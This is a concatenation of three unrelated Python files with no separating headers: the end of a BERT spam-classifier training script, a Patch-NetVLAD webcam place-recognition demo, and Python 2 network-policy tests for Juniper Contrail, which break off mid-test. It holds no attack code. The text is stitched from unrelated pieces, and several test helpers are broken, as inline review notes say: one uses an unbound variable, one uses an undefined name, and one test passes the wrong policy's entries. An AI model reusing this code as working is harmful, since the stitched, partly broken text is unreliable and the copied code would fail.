        ids = tokenizer.convert_tokens_to_ids(sequence) + [0] * padding
        mask = [1] * len(sequence) + [0] * padding
        all_ids.append(ids)
        all_masks.append(mask)
        all_segments.append([0] * max_len)
    return np.array(all_ids), np.array(all_masks), np.array(all_segments)
def build_model(bert_layer, max_len=512):
    """Build a binary spam classifier on top of a (trainable) BERT layer.

    Args:
        bert_layer: hub.KerasLayer wrapping a BERT encoder that returns
            (pooled_output, sequence_output).
        max_len: fixed token-sequence length of the three inputs.

    Returns:
        Compiled tf.keras Model mapping (word ids, mask, segment ids)
        to a sigmoid spam probability.
    """
    input_word_ids = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="input_word_ids")
    input_mask = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="input_mask")
    segment_ids = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="segment_ids")
    pooled_output, sequence_output = bert_layer([input_word_ids, input_mask, segment_ids])
    # Use the [CLS] token representation as the sentence embedding.
    clf_output = sequence_output[:, 0, :]
    net = tf.keras.layers.Dense(64, activation='relu')(clf_output)
    net = tf.keras.layers.Dropout(0.2)(net)
    net = tf.keras.layers.Dense(32, activation='relu')(net)
    net = tf.keras.layers.Dropout(0.2)(net)
    out = tf.keras.layers.Dense(1, activation='sigmoid')(net)
    model = tf.keras.models.Model(inputs=[input_word_ids, input_mask, segment_ids], outputs=out)
    # `lr` is a deprecated alias for `learning_rate` (removed in newer
    # Keras); same default behaviour, future-proof spelling.
    model.compile(tf.keras.optimizers.Adam(learning_rate=1e-5), loss='binary_crossentropy', metrics=['accuracy'])
    return model
"""split the following codes into several chunks in Jyputer
for clearer reading and saved variables
"""
train = load_data()
X_train, X_val, y_train, y_val = sklearn.model_selection.train_test_split(train.text.values, train.target, test_size=0.2, random_state=0)
logging.info("Data loaded and split")
max_len = 120
bert_layer = get_bert_layer()
tokenizer = get_tokenizer(bert_layer)
logging.info("bert_layer and tokenizer built")
X_train = bert_encode(X_train, tokenizer, max_len=max_len)
X_val = bert_encode(X_val, tokenizer, max_len=max_len)
logging.info("Text tokenized")
# Build model
model = build_model(bert_layer, max_len=max_len)
model.summary()
logging.info("Model built")
# Run model
checkpoint = tf.keras.callbacks.ModelCheckpoint('bert.h5', monitor='val_accuracy', save_best_only=True, verbose=1)
earlystopping = tf.keras.callbacks.EarlyStopping(monitor='val_accuracy', patience=5, verbose=1)
train_history = model.fit(
X_train, y_train,
validation_split=0.1,
epochs=1,
callbacks=[checkpoint, earlystopping],
batch_size=16,
verbose=1
)
logging.info("Model trainning complete")
# validation & predict
model.load_weights('bert.h5')
y_preds = model.predict(X_val).round().astype(int)
print("Validation accuracy score", sklearn.metrics.accuracy_score(y_preds, y_val))
|
#!/usr/bin/env python
'''
MIT License
Copyright (c) 2021 <NAME>, <NAME>, <NAME>, <NAME> and <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Performs place recognition using a two-stage image retrieval pipeline, where
the first step collects the top 100 database candidates and then geometric
verification produces the top 1 best match for every query. In this code, query
images are the image from webcam. Change the video index to select your webcam.
Requires feature_extract.py to be run first, on a folder of index/database
images.
Code already supports the datasets of Nordland, Pittsburgh 30k and Tokyo247,
please run tools/genImageListFile to create new imageNames files with your
filepaths pointing to where you saved these datasets (or, edit the text files
to remove the prefix and insert your own prefix).
'''
from __future__ import print_function
import os
import time
import argparse
import configparser
from os.path import join, isfile
from os.path import exists
from os import makedirs
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
import numpy as np
import faiss
from tqdm.auto import tqdm
import cv2
from PIL import Image
from patchnetvlad.tools.datasets import PlaceDataset, input_transform
from patchnetvlad.tools.patch_matcher import PatchMatcher
from patchnetvlad.models.local_matcher import normalise_func, calc_keypoint_centers_from_patches as calc_keypoint_centers_from_patches
from patchnetvlad.models.models_generic import get_backend, get_model, get_pca_encoding
from patchnetvlad.tools import PATCHNETVLAD_ROOT_DIR
def apply_patch_weights(input_scores, num_patches, patch_weights):
    """Return the weighted sum of the first `num_patches` patch scores.

    Raises:
        ValueError: if `patch_weights` does not have exactly
            `num_patches` entries.
    """
    if len(patch_weights) != num_patches:
        raise ValueError('The number of patch weights must equal the number of patches used')
    return sum(patch_weights[idx] * input_scores[idx] for idx in range(num_patches))
def plot_two(im1, im2, inlier_keypoints_one, inlier_keypoints_two, score, image_index, window_name):
    """Draw inlier keypoint correspondences between query `im1` and
    retrieved image `im2` and display them in an OpenCV window.

    `inlier_keypoints_one`/`_two` are parallel lists (one entry per patch
    size) of arrays of pixel coordinates indexed as [i, 0]/[i, 1];
    `score` and `image_index` are rendered into the caption text.
    """
    # Draw keypoints
    kp_all1 = []
    kp_all2 = []
    matches_all = []
    for this_inlier_keypoints_one, this_inlier_keypoints_two in zip(inlier_keypoints_one, inlier_keypoints_two):
        for i in range(this_inlier_keypoints_one.shape[0]):
            # Build cv2 KeyPoint/DMatch objects (size 1, no angle/octave info).
            kp_all1.append(cv2.KeyPoint(this_inlier_keypoints_one[i, 0].astype(float), this_inlier_keypoints_one[i, 1].astype(float), 1, -1, 0, 0, -1))
            kp_all2.append(cv2.KeyPoint(this_inlier_keypoints_two[i, 0].astype(float), this_inlier_keypoints_two[i, 1].astype(float), 1, -1, 0, 0, -1))
            matches_all.append(cv2.DMatch(i, i, 0))
    im_allpatch_matches = cv2.drawMatches(im1, kp_all1, im2, kp_all2,
                                          matches_all, None, matchColor=(0, 255, 0), flags=cv2.DRAW_MATCHES_FLAGS_NOT_DRAW_SINGLE_POINTS)
    cv2.putText(im_allpatch_matches, f"Retrieved Image: {image_index} ({score:.5})", (10, 20), cv2.FONT_HERSHEY_PLAIN, 1.5, (0,0,255), 2)
    cv2.imshow(window_name, im_allpatch_matches)
def feature_extract(model, device, config, img):
    """Extract Patch-NetVLAD descriptors for one BGR webcam frame.

    Returns:
        (local_feats_one, vlad_global_pca): a list holding one tensor of
        PCA-reduced patch features per configured patch size, and the
        PCA-reduced global descriptor as a numpy array.
    """
    pool_size = int(config['global_params']['num_pcs'])
    model.eval()
    it = input_transform((int(config['feature_extract']['imageresizeH']), int(config['feature_extract']['imageresizeW'])))
    # OpenCV delivers BGR frames; the transform pipeline expects an RGB PIL image.
    im_one_pil = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    im_one_pil = it(im_one_pil).unsqueeze(0)  # add batch dimension of 1
    input_data = im_one_pil.to(device)
    tqdm.write('====> Extracting Features')
    with torch.no_grad():
        image_encoding = model.encoder(input_data)
        vlad_local, vlad_global = model.pool(image_encoding)
        vlad_global_pca = get_pca_encoding(model, vlad_global).cpu().numpy()
        local_feats_one = []
        for this_iter, this_local in enumerate(vlad_local):
            # Run every patch descriptor through the model's PCA/whitening,
            # then restore the original layout before slicing out batch 0.
            this_local_feats = get_pca_encoding(model, this_local.permute(2, 0, 1).reshape(-1, this_local.size(1))). \
                reshape(this_local.size(2), this_local.size(0), pool_size).permute(1, 2, 0)
            local_feats_one.append(torch.transpose(this_local_feats[0, :, :], 0, 1))
    return local_feats_one, vlad_global_pca
def feature_match(eval_set, device, opt, config, im_query, local_feat, query_global_feat):
    """Two-stage retrieval for a single query frame.

    Stage 1 matches the query's global descriptor against the
    pre-extracted database descriptors with a faiss L2 index; stage 2
    re-ranks the candidates by local patch matching, then the top match
    of each stage is displayed in its own OpenCV window.
    """
    # input_query_local_features_prefix = join(opt.query_input_features_dir, 'patchfeats')
    # input_query_global_features_prefix = join(opt.query_input_features_dir, 'globalfeats.npy')
    input_index_local_features_prefix = join(opt.index_input_features_dir, 'patchfeats')
    input_index_global_features_prefix = join(opt.index_input_features_dir, 'globalfeats.npy')
    pool_size = query_global_feat.shape[1]
    dbFeat = np.load(input_index_global_features_prefix)
    # faiss requires float32 descriptors on both sides.
    if dbFeat.dtype != np.float32:
        query_global_feat = query_global_feat.astype('float32')
        dbFeat = dbFeat.astype('float32')
    tqdm.write('====> Building faiss index')
    faiss_index = faiss.IndexFlatL2(pool_size)
    # noinspection PyArgumentList
    faiss_index.add(dbFeat)
    n_values = []
    for n_value in config['feature_match']['n_values_all'].split(","):  # remove all instances of n that are bigger than maxK
        n_values.append(int(n_value))
    tqdm.write('====> Matching Global Features')
    if config['feature_match']['pred_input_path'] != 'None':
        predictions = np.load(config['feature_match']['pred_input_path'])  # optionally load predictions from a np file
    else:
        # noinspection PyArgumentList
        # _, predictions = faiss_index.search(global_feat, min(len(global_feat), max(n_values)))
        # NOTE(review): top-k is hard-coded to 3 here; n_values above is
        # computed but unused on this path.
        _, predictions = faiss_index.search(query_global_feat, 3)
    tqdm.write('====> Loading patch param from config')
    patch_sizes = [int(s) for s in config['global_params']['patch_sizes'].split(",")]
    strides = [int(s) for s in config['global_params']['strides'].split(",")]
    patch_weights = np.array(config['feature_match']['patchWeights2Use'].split(",")).astype(float)
    all_keypoints = []
    all_indices = []
    tqdm.write('====> Matching Local Features')
    for patch_size, stride in zip(patch_sizes, strides):
        # we currently only provide support for square patches, but this can be easily modified for future works
        keypoints, indices = calc_keypoint_centers_from_patches(config['feature_match'], patch_size, patch_size, stride, stride)
        all_keypoints.append(keypoints)
        all_indices.append(indices)
    matcher = PatchMatcher(config['feature_match']['matcher'], patch_sizes, strides, all_keypoints,
                           all_indices)
    reordered_preds = []
    for q_idx, pred in enumerate(tqdm(predictions, leave=False, desc='Patch compare pred')):
        diffs = np.zeros((predictions.shape[1], len(patch_sizes)))
        # we pre-transpose here to save compute speed
        for k, candidate in enumerate(pred):
            image_name_index = os.path.splitext(os.path.basename(eval_set.images[candidate]))[0]
            # Load the candidate's per-patch-size local features from disk.
            dbfeat = []
            for patch_size in patch_sizes:
                dbfilename = input_index_local_features_prefix + '_' + 'psize{}_'.format(patch_size) + image_name_index + '.npy'
                dbfeat.append(torch.tensor(np.load(dbfilename), device=device))
            if k == 0:
                # Get the NetVLAD top candidate's keypoints and score
                scores, keypoints_net_one, keypoints_net_two = matcher.match(local_feat, dbfeat)
                diffs[k, :] = scores
                score_net = -apply_patch_weights(scores, len(patch_sizes), patch_weights)
                print(f"NetVLAD: Similarity score between the two images is: {score_net:.5f}. Larger is better.")
            else:
                diffs[k, :], _, _ = matcher.match(local_feat, dbfeat)
        # Combine per-patch-size diffs and re-rank the candidate list.
        diffs = normalise_func(diffs, len(patch_sizes), patch_weights)
        cand_sorted = np.argsort(diffs)
        reordered_preds.append(pred[cand_sorted])
    # Top candidates from two methods
    image_name_index_net = os.path.splitext(os.path.basename(eval_set.images[predictions[0][0]]))[0]
    image_name_index_patch = os.path.splitext(os.path.basename(eval_set.images[reordered_preds[0][0]]))[0]
    # Get the Patch-NetVLAD top candidate's keypoints and score
    dbfeat = []
    for patch_size in patch_sizes:
        dbfilename = input_index_local_features_prefix + '_' + 'psize{}_'.format(patch_size) + image_name_index_patch + '.npy'
        dbfeat.append(torch.tensor(np.load(dbfilename), device=device))
    scores, keypoints_patch_one, keypoints_patch_two = matcher.match(local_feat, dbfeat)
    score_patch = -apply_patch_weights(scores, len(patch_sizes), patch_weights)
    print(f"Patch-NetVLAD: Similarity score between the two images is: {score_patch:.5f}. Larger is better.")
    print('predictions: ', predictions[0])
    print('reordered_preds: ', reordered_preds[0])
    # Show the most possible retrieved image
    image_list_array = np.array(eval_set.images)
    im_db_net = cv2.imread(image_list_array[predictions[0]][0])
    im_db_patch = cv2.imread(image_list_array[reordered_preds[0]][0])
    # using cv2 for their in-built keypoint correspondence plotting tools
    im_query = cv2.resize(im_query, (int(config['feature_extract']['imageresizeW']), int(config['feature_extract']['imageresizeH'])))
    im_db_net = cv2.resize(im_db_net, (int(config['feature_extract']['imageresizeW']), int(config['feature_extract']['imageresizeH'])))
    im_db_patch = cv2.resize(im_db_patch, (int(config['feature_extract']['imageresizeW']), int(config['feature_extract']['imageresizeH'])))
    # cv2 resize slightly different from torch, but for visualisation only not a big problem
    if config['feature_match']['matcher'] == 'RANSAC':
        # Draw local matches
        plot_two(im_query, im_db_net, keypoints_net_one, keypoints_net_two, score_net, image_name_index_net, 'NetVLAD')
        plot_two(im_query, im_db_patch, keypoints_patch_one, keypoints_patch_two, score_patch, image_name_index_patch, 'Patch-NetVLAD')
    else:
        cv2.imshow('NetVLAD Top Match', im_db_net)
        cv2.imshow('Patch-NetVLAD Top Match', im_db_patch)
def main():
    """Webcam place-recognition demo.

    Loads the Patch-NetVLAD model from the configured checkpoint, then
    loops: grab a webcam frame, extract its features, retrieve/display
    the best database match, until 'q' is pressed.
    """
    parser = argparse.ArgumentParser(description='Patch-NetVLAD-Feature-Match')
    parser.add_argument('--config_path', type=str, default=join(PATCHNETVLAD_ROOT_DIR, 'configs/performance.ini'),
                        help='File name (with extension) to an ini file that stores most of the configuration data for patch-netvlad')
    parser.add_argument('--dataset_root_dir', type=str, default='',
                        help='If the files in query_file_path and index_file_path are relative, use dataset_root_dir as prefix.')
    parser.add_argument('--index_file_path', type=str, required=True,
                        help='Path (with extension) to a text file that stores the save location and name of all database images in the dataset')
    parser.add_argument('--index_input_features_dir', type=str, required=True,
                        help='Path to load all database patch-netvlad features')
    parser.add_argument('--nocuda', action='store_true', help='If true, use CPU only. Else use GPU.')
    opt = parser.parse_args()
    print(opt)
    # load config file
    configfile = opt.config_path
    assert os.path.isfile(configfile)
    config = configparser.ConfigParser()
    config.read(configfile)
    # check GPU/cuda
    cuda = not opt.nocuda
    if cuda and not torch.cuda.is_available():
        raise Exception("No GPU found, please run with --nocuda")
    device = torch.device("cuda" if cuda else "cpu")
    # load model
    encoder_dim, encoder = get_backend()
    # must load from a resume to do extraction
    resume_ckpt = config['global_params']['resumePath'] + config['global_params']['num_pcs'] + '.pth.tar'
    # backup: try whether resume_ckpt is relative to script path
    if not isfile(resume_ckpt):
        resume_ckpt = join(PATCHNETVLAD_ROOT_DIR, resume_ckpt)
        if not isfile(resume_ckpt):
            # Last resort: offer to download the pretrained checkpoints.
            from download_models import download_all_models
            download_all_models(ask_for_permission=True)
    if isfile(resume_ckpt):
        print("=> loading checkpoint '{}'".format(resume_ckpt))
        checkpoint = torch.load(resume_ckpt, map_location=lambda storage, loc: storage)
        # Checkpoint must match the configured PCA output dimensionality.
        assert checkpoint['state_dict']['WPCA.0.bias'].shape[0] == int(config['global_params']['num_pcs'])
        config['global_params']['num_clusters'] = str(checkpoint['state_dict']['pool.centroids'].shape[0])
        model = get_model(encoder, encoder_dim, opt, config['global_params'], append_pca_layer=True)
        if int(config['global_params']['nGPU']) > 1 and torch.cuda.device_count() > 1:
            model.encoder = nn.DataParallel(model.encoder)
            model.pool = nn.DataParallel(model.pool)
        model.load_state_dict(checkpoint['state_dict'])
        model = model.to(device)
        print("=> loaded checkpoint '{}'".format(resume_ckpt, ))
    else:
        raise FileNotFoundError("=> no checkpoint found at '{}'".format(resume_ckpt))
    # check database path
    if not os.path.isfile(opt.index_file_path):
        opt.index_file_path = join(PATCHNETVLAD_ROOT_DIR, 'dataset_imagenames', opt.index_file_path)
    # Webcam capture; change the video index (0) to select another camera.
    vid = cv2.VideoCapture(0)
    vid.set(cv2.CAP_PROP_BUFFERSIZE, 1)
    vid.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
    vid.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
    start = time.time()
    while(True):
        _, frame = vid.read()
        # extract query feature
        local_feat, global_feat = feature_extract(model, device, config, frame)
        # NOTE(review): the dataset is re-parsed on every frame; it could
        # be built once before the loop.
        dataset = PlaceDataset(None, opt.index_file_path, opt.dataset_root_dir, None, config['feature_extract'])
        # match feature
        feature_match(dataset, device, opt, config, frame, local_feat, global_feat)
        key = cv2.waitKey(1)
        if key & 0xFF == ord('q'):
            break
        elif key & 0xFF == ord('n'):
            print('why press \'n\'?')
        # Per-iteration FPS from wall-clock delta between frames.
        end = time.time()
        elapse = end - start
        start = end
        print(f"FPS: {1/elapse}")
        cv2.putText(frame, f"FPS: {1/elapse}", (10, 20), cv2.FONT_HERSHEY_PLAIN, 1.5, (0,128,128), 1)
        cv2.imshow('Query Image', frame)
    vid.release()
    cv2.destroyAllWindows()
    torch.cuda.empty_cache()  # garbage clean GPU memory, a bug can occur when Pytorch doesn't automatically clear the
    # memory after runs


if __name__ == "__main__":
    main()
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import sys
import gevent
sys.path.append("../common/tests")
from testtools.matchers import Equals, Contains, Not
from test_utils import *
import test_common
import test_case
from vnc_api.vnc_api import *
try:
import to_bgp
except ImportError:
from schema_transformer import to_bgp
from time import sleep
def retry_exc_handler(tries_remaining, exception, delay):
    # Hook for the @retries decorator: report each failed attempt to
    # stderr (Python 2 "print >>" redirection syntax).
    print >> sys.stderr, "Caught '%s', %d tries remaining, sleeping for %s seconds" % (exception, tries_remaining, delay)
def retries(max_tries, delay=1, backoff=2, exceptions=(Exception,), hook=None):
    """Decorator: retry the wrapped call up to `max_tries` times.

    On each caught exception (from `exceptions`) with tries remaining,
    call `hook(tries_remaining, exception, delay)` if given, sleep for
    the current delay, then multiply the delay by `backoff`; re-raise
    when the budget is exhausted. Python 2 code: `range(...)` returns a
    list, so in-place `.reverse()` works.
    """
    def dec(func):
        def f2(*args, **kwargs):
            mydelay = delay
            tries = range(max_tries)
            tries.reverse()  # count tries_remaining down: max_tries-1 .. 0
            for tries_remaining in tries:
                try:
                    return func(*args, **kwargs)
                except exceptions as e:
                    if tries_remaining > 0:
                        if hook is not None:
                            hook(tries_remaining, e, mydelay)
                        sleep(mydelay)
                        mydelay = mydelay * backoff  # exponential backoff
                    else:
                        raise
                else:
                    # NOTE(review): unreachable -- the `try` body returns,
                    # so this `else` (no-exception path) never runs.
                    break
        return f2
    return dec
class TestPolicy(test_case.STTestCase):
    """Schema-transformer integration tests for network-policy handling.

    The check_* helpers are wrapped with @retries so they poll the API
    server until the expected state converges (the transformer applies
    changes asynchronously). Python 2 code: print statements and
    `except E, e` syntax throughout.
    """

    @retries(5, hook=retry_exc_handler)
    def check_service_chain_prefix_match(self, fq_name, prefix):
        # Poll until the RI carries service-chain info whose first
        # advertised prefix equals `prefix`.
        ri = self._vnc_lib.routing_instance_read(fq_name)
        sci = ri.get_service_chain_information()
        if sci is None:
            print "retrying ... ", test_common.lineno()
            raise NoIdError
        self.assertEqual(sci.prefix[0], prefix)

    @retries(5, hook=retry_exc_handler)
    def check_ri_rt_state_vn_policy(self, fq_name, to_fq_name, expect_to_find):
        # Assert whether any route-target of RI `fq_name` is (or is not,
        # per `expect_to_find`) back-referenced by RI `to_fq_name`.
        ri = self._vnc_lib.routing_instance_read(fq_name)
        rt_refs = ri.get_route_target_refs()
        if not rt_refs:
            print "retrying ... ", test_common.lineno()
            raise NoIdError
        found = False
        for rt_ref in rt_refs:
            rt_obj = self._vnc_lib.route_target_read(id=rt_ref['uuid'])
            ri_refs = rt_obj.get_routing_instance_back_refs()
            for ri_ref in ri_refs:
                if ri_ref['to'] == to_fq_name:
                    found = True
                    break
            if found == True:
                break
        self.assertTrue(found == expect_to_find)

    @retries(5, hook=retry_exc_handler)
    def check_ri_state_vn_policy(self, fq_name, to_fq_name):
        # The first connected routing instance of `fq_name` must be
        # `to_fq_name`.
        ri = self._vnc_lib.routing_instance_read(fq_name)
        ri_refs = ri.get_routing_instance_refs()
        if not ri_refs:
            print "retrying ... ", test_common.lineno()
            raise NoIdError
        self.assertEqual(ri_refs[0]['to'], to_fq_name)

    @retries(5, hook=retry_exc_handler)
    def check_ri_refs_are_deleted(self, fq_name):
        # Retry until the RI no longer holds connections to other RIs.
        ri = self._vnc_lib.routing_instance_read(fq_name)
        ri_refs = ri.get_routing_instance_refs()
        if ri_refs:
            print "retrying ... ", test_common.lineno()
            raise Exception

    @retries(5, hook=retry_exc_handler)
    def check_vn_is_deleted(self, uuid):
        # Success == the read raises NoIdError (object gone).
        try:
            self._vnc_lib.virtual_network_read(id=uuid)
            print "retrying ... ", test_common.lineno()
            raise Exception
        except NoIdError:
            print 'vn deleted'

    @retries(5, hook=retry_exc_handler)
    def check_ri_is_deleted(self, fq_name):
        # Success == the read raises NoIdError (object gone).
        try:
            self._vnc_lib.routing_instance_read(fq_name)
            print "retrying ... ", test_common.lineno()
            raise Exception
        except NoIdError:
            print 'ri deleted'

    @retries(5, hook=retry_exc_handler)
    def check_ri_is_present(self, fq_name):
        # Succeeds as soon as the RI can be read.
        self._vnc_lib.routing_instance_read(fq_name)

    @retries(5, hook=retry_exc_handler)
    def check_link_in_ifmap_graph(self, fq_name_str, links):
        # NOTE(review): reads `fq_name`, which is not defined here (the
        # parameter is `fq_name_str`), and ignores `links` entirely --
        # this helper raises NameError if ever called.
        self._vnc_lib.routing_instance_read(fq_name)

    @retries(5, hook=retry_exc_handler)
    def wait_to_get_sc(self):
        # Wait until at least one service chain exists, then return the
        # list of service-chain names.
        sc = [x for x in to_bgp.ServiceChain]
        if len(sc) == 0:
            print "retrying ... ", test_common.lineno()
            raise Exception
        return sc

    @retries(5, hook=retry_exc_handler)
    def check_acl_match_dst_cidr(self, fq_name, ip_prefix, ip_len):
        # NOTE(review): `rule` is never bound in this scope -- a loop
        # over acl.get_access_control_list_entries().get_acl_rule()
        # appears to have been dropped, so this raises NameError
        # instead of matching ACL rules.
        acl = self._vnc_lib.access_control_list_read(fq_name)
        if (rule.match_condition.dst_address.subnet is not None and
                rule.match_condition.dst_address.subnet.ip_prefix == ip_prefix and
                rule.match_condition.dst_address.subnet.ip_prefix_len == ip_len):
            return
        raise Exception('prefix %s/%d not found in ACL rules for %s' %
                        (ip_prefix, ip_len, fq_name))

    def test_basic_policy(self):
        # Attach one policy (vn1 <-> vn2) to both networks, verify the
        # routing instances get connected, then detach and verify cleanup.
        vn1_name = 'vn1'
        vn2_name = 'vn2'
        vn1_obj = VirtualNetwork(vn1_name)
        vn2_obj = VirtualNetwork(vn2_name)
        np = self.create_network_policy(vn1_obj, vn2_obj)
        seq = SequenceType(1, 1)
        vnp = VirtualNetworkPolicyType(seq)
        vn1_obj.set_network_policy(np, vnp)
        vn2_obj.set_network_policy(np, vnp)
        vn1_uuid = self._vnc_lib.virtual_network_create(vn1_obj)
        vn2_uuid = self._vnc_lib.virtual_network_create(vn2_obj)
        # Both networks should show up as identities in the fake IF-MAP graph.
        for obj in [vn1_obj, vn2_obj]:
            ident_name = self.get_obj_imid(obj)
            gevent.sleep(2)
            ifmap_ident = self.assertThat(FakeIfmapClient._graph, Contains(ident_name))
        try:
            self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
                                          to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'])
        except NoIdError, e:
            print "failed : routing instance state is not correct... ", test_common.lineno()
            self.assertTrue(False)
        try:
            self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'],
                                          to_fq_name=[u'default-domain', u'default-project', u'vn1', u'vn1'])
        except NoIdError, e:
            print "failed : routing instance state is not correct... ", test_common.lineno()
            self.assertTrue(False)
        # Detach the policy and make sure the RI connections disappear.
        vn1_obj.del_network_policy(np)
        vn2_obj.del_network_policy(np)
        self._vnc_lib.virtual_network_update(vn1_obj)
        self._vnc_lib.virtual_network_update(vn2_obj)
        try:
            self.check_ri_refs_are_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
        except Exception, e:
            print "failed : ri refs are still present in routing instance [vn2]... ", test_common.lineno()
            self.assertTrue(False)
        self.delete_network_policy(np)
        self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
        self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
        try:
            self.check_vn_is_deleted(uuid=vn1_obj.uuid)
        except Exception, e:
            print "failed : vn1 is still present in api server ... ", test_common.lineno()
            self.assertTrue(False)
        try:
            self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
        except Exception, e:
            print "failed : ri1 is still present in api server ... ", test_common.lineno()
            self.assertTrue(False)
    # end test_basic_policy

    def test_multiple_policy(self):
        # Two policies, one per direction; toggle each between pass/deny
        # and verify the RI connection appears in the IF-MAP graph.
        vn1_name = 'vn1'
        vn2_name = 'vn2'
        vn1_obj = VirtualNetwork(vn1_name)
        vn2_obj = VirtualNetwork(vn2_name)
        np1 = self.create_network_policy(vn1_obj, vn2_obj)
        np2 = self.create_network_policy(vn2_obj, vn1_obj)
        seq = SequenceType(1, 1)
        vnp = VirtualNetworkPolicyType(seq)
        vn1_obj.set_network_policy(np1, vnp)
        vn2_obj.set_network_policy(np2, vnp)
        vn1_uuid = self._vnc_lib.virtual_network_create(vn1_obj)
        vn2_uuid = self._vnc_lib.virtual_network_create(vn2_obj)
        try:
            self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
                                          to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'])
        except NoIdError, e:
            print "failed : routing instance state is not correct... ", test_common.lineno()
            self.assertTrue(False)
        try:
            self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'],
                                          to_fq_name=[u'default-domain', u'default-project', u'vn1', u'vn1'])
        except NoIdError, e:
            print "failed : routing instance state is not correct... ", test_common.lineno()
            self.assertTrue(False)
        # Flip np1 to deny and expect the vn1->vn2 connection to remain
        # only while np2 still allows traffic the other way.
        np1.network_policy_entries.policy_rule[0].action_list.simple_action = 'deny'
        np1.set_network_policy_entries(np1.network_policy_entries)
        self._vnc_lib.network_policy_update(np1)
        expr = "('contrail:connection contrail:routing-instance:default-domain:default-project:vn2:vn2' in FakeIfmapClient._graph['contrail:routing-instance:default-domain:default-project:vn1:vn1']['links'])"
        self.assertTill(expr)
        np1.network_policy_entries.policy_rule[0].action_list.simple_action = 'pass'
        np1.set_network_policy_entries(np1.network_policy_entries)
        self._vnc_lib.network_policy_update(np1)
        np2.network_policy_entries.policy_rule[0].action_list.simple_action = 'deny'
        np2.set_network_policy_entries(np2.network_policy_entries)
        self._vnc_lib.network_policy_update(np2)
        expr = "('contrail:connection contrail:routing-instance:default-domain:default-project:vn1:vn1' in FakeIfmapClient._graph['contrail:routing-instance:default-domain:default-project:vn2:vn2']['links'])"
        self.assertTill(expr)
        # Teardown and cleanup verification.
        vn1_obj.del_network_policy(np1)
        vn2_obj.del_network_policy(np2)
        self._vnc_lib.virtual_network_update(vn1_obj)
        self._vnc_lib.virtual_network_update(vn2_obj)
        try:
            self.check_ri_refs_are_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
        except Exception, e:
            print "failed : ri refs are still present in routing instance [vn2]... ", test_common.lineno()
            self.assertTrue(False)
        self.delete_network_policy(np1)
        self.delete_network_policy(np2)
        self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
        self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
        try:
            self.check_vn_is_deleted(uuid=vn1_obj.uuid)
        except Exception, e:
            print "failed : vn1 is still present in api server ... ", test_common.lineno()
            self.assertTrue(False)
    # end test_multiple_policy

    def test_policy_in_policy(self):
        # Policies referencing other policies ('local' / policy targets);
        # verify transitive RI connections, including a third network
        # attached to np2.
        vn1_name = 'vn1'
        vn2_name = 'vn2'
        vn3_name = 'vn3'
        vn1_obj = VirtualNetwork(vn1_name)
        vn2_obj = VirtualNetwork(vn2_name)
        np1 = self.create_network_policy(vn1_obj, vn2_obj)
        np2 = self.create_network_policy(vn2_obj, vn1_obj)
        # np1's destination becomes "whatever np2 applies to" instead of
        # a concrete virtual network.
        np1.network_policy_entries.policy_rule[0].dst_addresses[0].virtual_network = None
        np1.network_policy_entries.policy_rule[0].dst_addresses[0].network_policy = np2.get_fq_name_str()
        np1.set_network_policy_entries(np1.network_policy_entries)
        self._vnc_lib.network_policy_update(np1)
        np2.network_policy_entries.policy_rule[0].src_addresses[0].virtual_network = 'local'
        # NOTE(review): np2 is updated with *np1's* entries here -- looks
        # like a copy/paste slip; confirm intent before changing.
        np2.set_network_policy_entries(np1.network_policy_entries)
        self._vnc_lib.network_policy_update(np2)
        seq = SequenceType(1, 1)
        vnp = VirtualNetworkPolicyType(seq)
        vn1_obj.set_network_policy(np1, vnp)
        vn2_obj.set_network_policy(np2, vnp)
        vn1_uuid = self._vnc_lib.virtual_network_create(vn1_obj)
        vn2_uuid = self._vnc_lib.virtual_network_create(vn2_obj)
        try:
            self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
                                          to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'])
        except NoIdError, e:
            print "failed : routing instance state is not correct... ", test_common.lineno()
            self.assertTrue(False)
        try:
            self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'],
                                          to_fq_name=[u'default-domain', u'default-project', u'vn1', u'vn1'])
        except NoIdError, e:
